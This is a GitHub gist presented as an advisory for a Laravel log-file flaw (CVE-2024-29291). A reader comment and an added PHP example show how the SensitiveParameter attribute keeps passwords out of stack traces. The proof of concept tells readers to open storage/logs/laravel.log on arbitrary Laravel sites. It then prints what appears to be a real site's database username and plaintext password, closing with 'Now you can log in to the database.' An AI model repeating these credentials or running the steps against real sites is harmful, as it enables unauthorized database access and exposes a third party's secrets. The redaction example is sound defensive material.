@whiteman007
Last active June 4, 2024 14:15
CVE-ID: CVE-2024-29291
Description:
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.
Additional Information:
None.
Risk:
High.
Vulnerability Type:
Database credential leak vulnerability.
Vendor of Product:
Laravel Framework.
Affected Product Code Base:
Laravel FRAMEWORK - 8.* - 11.*
Affected Component:
laravel.log.
Attack Type:
Remote.
Impact Information Disclosure:
True.
Attack Vectors:
Database credential leak vulnerability.
Description:
Access to private database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
Now you can log in to the database.
By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/
@geovaniralmeida

The Connector class could make use of the SensitiveParameter attribute. Seems appropriate
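
The SensitiveParameter attribute mentioned in the comment above, shown as an added example that is not part of the gist or of Laravel's code: the same failing call is traced once with a plain password parameter and once with the parameter marked `#[\SensitiveParameter]` (PHP 8.2+). `DemoConnector`, `traceFor`, the host name and the credentials are hypothetical and constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example: DemoConnector is hypothetical and is not Laravel's Connector class.
// Requires PHP 8.2+, where the #[\SensitiveParameter] attribute was introduced.

// Record arguments in traces for this demo; when this setting is On,
// PHP omits all arguments from exception traces.
ini_set('zend.exception_ignore_args', '0');

final class DemoConnector
{
    // Unprotected: the password is captured as a plain stack-frame argument.
    public function connectPlain(string $dsn, string $username, string $password): never
    {
        throw new RuntimeException('connection refused (constructed failure)');
    }

    // Protected: PHP stores a SensitiveParameterValue object in the trace instead.
    public function connectRedacted(
        string $dsn,
        string $username,
        #[\SensitiveParameter] string $password
    ): never {
        throw new RuntimeException('connection refused (constructed failure)');
    }
}

// Return the trace text that an exception handler would write to a log file.
function traceFor(callable $connect): string
{
    try {
        // Constructed sample values, not real credentials.
        $connect('mysql:host=db.example.invalid', 'demo_user', 'constructed-pw');
    } catch (RuntimeException $e) {
        return $e->getTraceAsString();
    }
    return '';
}

$connector = new DemoConnector();
$plain     = traceFor($connector->connectPlain(...));
$redacted  = traceFor($connector->connectRedacted(...));

echo "Without attribute:\n$plain\n\nWith attribute:\n$redacted\n\n";

// Report which of the two traces still contains the constructed password.
echo 'plain trace leaks password: ', var_export(str_contains($plain, 'constructed-pw'), true), "\n";
echo 'redacted trace leaks password: ', var_export(str_contains($redacted, 'constructed-pw'), true), "\n";
```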
